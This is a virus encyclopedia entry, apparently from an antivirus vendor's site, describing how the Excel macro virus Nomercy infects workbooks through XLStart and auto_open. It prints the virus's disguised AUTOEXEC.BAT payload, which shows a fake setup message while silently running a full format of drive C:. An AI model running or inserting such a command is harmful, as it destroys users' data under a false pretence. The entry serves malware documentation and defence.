|
|
Macro.Excel.Nomerc Viruses Information
| Name: |
Macro.Excel.Nomerc |
| Category: |
Viruses |
| Description:
|
Details
Macro.Excel.Nomercy
This macro-virus infects Excel worksheets (XLS-files). It contains two modules: Members and NoMercy2.
To infect Excel, the virus creates an infected NOMERCY.XLM file in the Excel startup directory (XLStart). The virus contains auto-macro auto_open in its NoMercy2 module, and the auto-macro sets the Fuck macro (infection routine) on OnSheetActivate call. As a result, the virus infects sheets that are activated. The virus detects already infected files by the "NoMercy2" module name.
The virus erases all menu items which work with macros. On Monday after 7 a.m., the virus appends to the C:AUTOEXEC.BAT file a command that formats the hard disk:
@ECHO OFF
CLS
ECHO Please wait while setup Updates Your configuration Files
ECHO This may take a few minutesall
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO Complete !!!
ECHO.
ECHO.
ECHO Result :
ECHO All Data Lost!!! |
Top Viruses Visited Pages:
Invader. - 241 visits
not-a-virus:RiskWare.Tool.RegPatch. - 73 visits
Worm.P2P.Harex. - 67 visits
not-a-virus:RemoteAdmin.Win32.RAdmin.2 - 60 visits
Small.58. - 56 visits
Coito.64 - 54 visits
I-Worm.Mapson. - 48 visits
Win32.Hidra - 43 visits
Win16.Klon.1177 - 42 visits
Marine.500 - 35 visits
Random Viruses Pages:
RS
Cripple.40
Win32.VCell.304
Macro.Word97.Hor
Kak.39
Andryushka.353
Amt.300
PFS.378
Win32.Evol.
Brontozavr.128
|
|